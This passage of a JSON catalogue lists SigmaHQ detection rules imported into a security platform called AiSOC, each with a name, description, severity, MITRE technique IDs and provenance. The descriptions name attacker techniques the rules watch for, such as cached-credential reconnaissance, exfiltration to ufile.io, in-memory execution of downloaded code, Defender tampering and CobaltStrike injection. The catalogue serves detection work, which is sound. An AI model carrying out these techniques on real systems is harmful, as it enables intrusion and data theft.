"sigmahq-sigma-07aa184a-870d-413d-893a-157f317f6f58", "type": "detection", "name": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\", which can be used to gather information about the target machine", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1615", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-reconnaissance-activity-via-gathernetworkinfo-vbs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07aa184a-870d-413d-893a-157f317f6f58", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_gather_network_info_execution.yml" } }, { "id": "sigmahq-sigma-07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "type": "detection", "name": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", "description": "Detects obfuscated PowerShell that uses MSHTA in scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-mshta-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" } }, { "id": "sigmahq-sigma-07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", "type": "detection", "name": "Terminal Server Client Connection History Cleared - Registry", "description": "Detects the deletion of registry keys containing the MSTSC connection history", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/terminal-server-client-connection-history-cleared-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" } }, { "id": "sigmahq-sigma-07e3cb2c-0608-410d-be4b-1511cb1a0448", "type": "detection", "name": "Tamper Windows Defender Remove-MpPreference", "description": "Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/tamper-windows-defender-remove-mppreference.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_remove_mppreference.yml" } }, { "id": "sigmahq-sigma-07e97cc6-aed1-43ae-9081-b3470d2367f1", "type": "detection", "name": "Okta Suspicious Activity Reported by End-user", "description": "Detects when an Okta end-user reports activity by their account as being potentially suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-suspicious-activity-reported-by-end-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07e97cc6-aed1-43ae-9081-b3470d2367f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_suspicious_activity_enduser_report.yml" } }, { "id": "sigmahq-sigma-07f8bdc2-c9b3-472a-9817-5a670b872f53", "type": "detection", "name": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", "description": "Detects usage of cmdkey to look for cached credentials on the system", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-reconnaissance-for-cached-credentials-via-cmdkey-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml" } }, { "id": "sigmahq-sigma-08200f85-2678-463e-9c32-88dce2f073d1", "type": "detection", "name": "MSSQL Add Account To Sysadmin Role", "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-add-account-to-sysadmin-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "08200f85-2678-463e-9c32-88dce2f073d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml" } }, { "id": "sigmahq-sigma-08249dc0-a28d-4555-8ba5-9255a198e08c", "type": "detection", "name": "Local Network Connection Initiated By Script Interpreter", "description": "Detects a script interpreter 
(Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/local-network-connection-initiated-by-script-interpreter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "08249dc0-a28d-4555-8ba5-9255a198e08c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_wscript_cscript_local_connection.yml" } }, { "id": "sigmahq-sigma-086ae989-9ca6-4fe7-895a-759c5544f247", "type": "detection", "name": "Potential Persistence Via TypedPaths", "description": "Detects modification of or addition to the 'TypedPaths' key in the user or admin registry from a non-standard application, 
which might indicate a persistence attempt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-typedpaths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "086ae989-9ca6-4fe7-895a-759c5544f247", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" } }, { "id": "sigmahq-sigma-087790e3-3287-436c-bccf-cbd0184a7db1", "type": "detection", "name": "Potential CommandLine Path Traversal Via Cmd.EXE", "description": "Detects potential path traversal attempt via cmd.exe. 
Could indicate possible command/argument confusion/hijacking", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-commandline-path-traversal-via-cmd-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "087790e3-3287-436c-bccf-cbd0184a7db1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_path_traversal.yml" } }, { "id": "sigmahq-sigma-0877ed01-da46-4c49-8476-d49cdd80dfa7", "type": "detection", "name": "Screen Capture - macOS", "description": "Detects attempts to use screencapture to collect macOS screenshots", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screen-capture-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0877ed01-da46-4c49-8476-d49cdd80dfa7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_screencapture.yml" } }, { "id": "sigmahq-sigma-089dbdf6-b960-4bcc-90e3-ffc3480c20f6", "type": "detection", "name": "File and Directory Discovery 
- MacOS", "description": "Detects usage of system utilities to discover files and directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-and-directory-discovery-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" } }, { "id": "sigmahq-sigma-089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "type": "detection", "name": "Regsvr32 DLL Execution With Suspicious File Extension", "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as other files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/regsvr32-dll-execution-with-suspicious-file-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_susp_extensions.yml" } }, { 
"id": "sigmahq-sigma-08d6ac24-c927-4469-b3b7-2e422d6e3c43", "type": "detection", "name": "Azure Kubernetes Network Policy Change", "description": "Identifies when an Azure Kubernetes network policy is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-network-policy-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_network_policy_change.yml" } }, { "id": "sigmahq-sigma-08f26069-6f80-474b-8d1f-d971c6fedea0", "type": "detection", "name": "User Has Been Deleted Via Userdel", "description": "Detects execution of the \"userdel\" binary, which is used to delete a user account and related files. 
This is sometimes abused by threat actors in order to cover their tracks", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-has-been-deleted-via-userdel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "08f26069-6f80-474b-8d1f-d971c6fedea0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_userdel.yml" } }, { "id": "sigmahq-sigma-0900463c-b33b-49a8-be1d-552a3b553dae", "type": "detection", "name": "Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI", "description": "Detects command line containing reference to the \"::$index_allocation\" stream, which can be used as a technique to prevent access to folders or files from tooling such as \"explorer.exe\" or \"powershell.exe\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-hidden-directory-creation-via-ntfs-index-allocation-stream-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0900463c-b33b-49a8-be1d-552a3b553dae", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml" } }, { "id": "sigmahq-sigma-090ffaad-c01a-4879-850c-6d57da98452d", "type": "detection", "name": "DNS Query To Ufile.io - DNS Client", "description": "Detects DNS queries to \"ufile.io\", which was seen abused by malware and threat actors as a method for data exfiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-ufile-io-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "090ffaad-c01a-4879-850c-6d57da98452d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml" } }, { "id": "sigmahq-sigma-0922467f-db53-4348-b7bf-dee8d0d348c6", "type": "detection", "name": "New CA Policy by Non-approved Actor", "description": "Monitor and alert on conditional access changes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-ca-policy-by-non-approved-actor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0922467f-db53-4348-b7bf-dee8d0d348c6", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" } }, { "id": "sigmahq-sigma-092af964-4233-4373-b4ba-d86ea2890288", "type": "detection", "name": "Add Debugger Entry To AeDebug For Persistence", "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-debugger-entry-to-aedebug-for-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "092af964-4233-4373-b4ba-d86ea2890288", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" } }, { "id": "sigmahq-sigma-092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", "type": "detection", "name": "PowerShell Core DLL Loaded By Non PowerShell Process", "description": "Detects loading of essential DLLs used by PowerShell by non-PowerShell process.\nDetects behavior similar to meterpreter's \"load powershell\" extension.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/powershell-core-dll-loaded-by-non-powershell-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml" } }, { "id": "sigmahq-sigma-093d68c7-762a-42f4-9f46-95e79142571a", "type": "detection", "name": "Shell Execution via Nice - Linux", "description": "Detects the use of the \"nice\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-via-nice-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "093d68c7-762a-42f4-9f46-95e79142571a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_nice_shell_execution.yml" } }, { "id": "sigmahq-sigma-09438caa-07b1-4870-8405-1dbafe3dad95", "type": "detection", "name": "Azure Subscription Permission Elevation Via ActivityLogs", "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it 
isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-subscription-permission-elevation-via-activitylogs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09438caa-07b1-4870-8405-1dbafe3dad95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_subscription_permissions_elevation_via_activitylogs.yml" } }, { "id": "sigmahq-sigma-0944e002-e3f6-4eb5-bf69-3a3067b53d73", "type": "detection", "name": "PowerShell Set-Acl On Windows Folder", "description": "Detects PowerShell scripts to set the ACL to a file in the Windows folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-set-acl-on-windows-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0944e002-e3f6-4eb5-bf69-3a3067b53d73", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml" } }, { 
"id": "sigmahq-sigma-0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "type": "detection", "name": "Use of Pcalua For Execution", "description": "Detects execution of commands and binaries from the context of the Program Compatibility Assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-pcalua-for-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" } }, { "id": "sigmahq-sigma-09570ae5-889e-43ea-aac0-0e1221fb3d95", "type": "detection", "name": "Remove Exported Mailbox from Exchange Webserver", "description": "Detects removal of an exported Exchange mailbox, which could be an attempt to cover tracks after ProxyShell exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remove-exported-mailbox-from-exchange-webserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" } }, { "id": "sigmahq-sigma-09576804-7a05-458e-a817-eb718ca91f54", "type": "detection", "name": "Suspicious PowerShell IEX Execution Patterns", "description": "Detects suspicious ways to run Invoke-Expression via its IEX alias (commonly used to execute downloaded or decoded script content in memory)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-iex-execution-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09576804-7a05-458e-a817-eb718ca91f54", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml" } }, { "id": "sigmahq-sigma-09658312-bc27-4a3b-91c5-e49ab9046d1b", "type": "detection", "name": "WMIC Unquoted Services Path Lookup - PowerShell", "description": "Detects a well-known WMI reconnaissance method for locating unquoted service paths, commonly used by pentesters and attackers inside PowerShell enumeration scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmic-unquoted-services-path-lookup-powershell.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09658312-bc27-4a3b-91c5-e49ab9046d1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" } }, { "id": "sigmahq-sigma-09706624-b7f6-455d-9d02-adee024cee1d", "type": "detection", "name": "HackTool - CobaltStrike BOF Injection Pattern", "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-cobaltstrike-bof-injection-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09706624-b7f6-455d-9d02-adee024cee1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml" } }, { "id": "sigmahq-sigma-098d7118-55bc-4912-a836-dc6483a8d150", "type": "detection", "name": "Access To ADMIN$ Network Share", "description": "Detects access to ADMIN$ network share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/access-to-admin-network-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "098d7118-55bc-4912-a836-dc6483a8d150", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_admin_share_access.yml" } }, { "id": "sigmahq-sigma-09a910bf-f71f-4737-9c40-88880ba5913d", "type": "detection", "name": "Potential Base64 Decoded From Images", "description": "Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-base64-decoded-from-images.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "09a910bf-f71f-4737-9c40-88880ba5913d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_tail_base64_decode_from_image.yml" } }, { "id": "sigmahq-sigma-09d3b48b-be17-47f5-bf4e-94e7e75d09ce", "type": "detection", "name": "Potential Malicious AppX Package Installation Attempts", "description": "Detects potential installation or installation attempts of known malicious appx packages", "version": "1.0.0", "author": "AiSOC", "tags": [ 
